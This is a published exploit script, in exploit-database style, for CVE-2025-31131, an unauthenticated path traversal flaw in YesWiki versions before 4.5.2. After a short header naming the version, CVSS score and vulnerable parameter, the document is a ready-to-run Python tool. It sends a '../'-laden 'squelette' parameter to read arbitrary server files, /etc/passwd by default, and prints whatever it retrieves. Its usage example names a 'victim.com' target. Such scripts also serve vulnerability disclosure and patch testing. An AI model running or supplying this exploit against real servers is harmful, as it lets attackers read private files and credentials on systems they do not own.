# Exploit Title: YesWiki < 4.5.2 - Unauthenticated Path Traversal # Exploit Author: Al Baradi Joy # Exploit Date: April 6, 2025 # CVE ID: CVE-2025-31131 # Vendor Homepage: https://yeswiki.net/ # Software Link: https://github.com/YesWiki/yeswiki # Affected Version: < 4.5.2 # Tested On: YesWiki 4.5.1 on Ubuntu 22.04 # Vulnerability Type: Unauthenticated Path Traversal (LFI) # CVSS Score: 8.6 (High) # CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N # Description: # YesWiki before version 4.5.2 is vulnerable to unauthenticated path traversal via the 'squelette' parameter. # A remote attacker can exploit this issue to read arbitrary files on the server, such as /etc/passwd. import requests import sys def banner(): print("=" * 80) print(" YesWiki < 4.5.2 - Unauthenticated Path Traversal (CVE-2025-31131)") print(" Exploit Author: Al Baradi Joy") print("=" * 80) def exploit(target, filename="/etc/passwd"): if not target.startswith("http"): target = "http://" + target traversal = "../" * 8 encoded_file = filename.replace("/", "%2f") payload = f"/?UrkCEO/edit&theme=margot&squelette={traversal}{encoded_file}&style=margot.css" url = target.rstrip("/") + payload try: print(f"[+] Target: {target}") print(f"[+] Attempting to read: {filename}") response = requests.get(url, timeout=10) if response.status_code == 200 and "root:" in response.text: print("[+] Exploit successful. File contents:\n") print(response.text) else: print("[!] Exploit failed or file not readable.") print(f"Status Code: {response.status_code}") if len(response.text) < 200: print(f"Response:\n{response.text}") except requests.exceptions.RequestException as e: print(f"[!] Request failed: {e}") if __name__ == "__main__": banner() if len(sys.argv) < 2: print(f"Usage: python3 {sys.argv[0]} [file_to_read]") print(f"Example: python3 {sys.argv[0]} http://victim.com /etc/passwd") sys.exit(1) target_url = sys.argv[1] file_to_read = sys.argv[2] if len(sys.argv) > 2 else "/etc/passwd" exploit(target_url, file_to_read)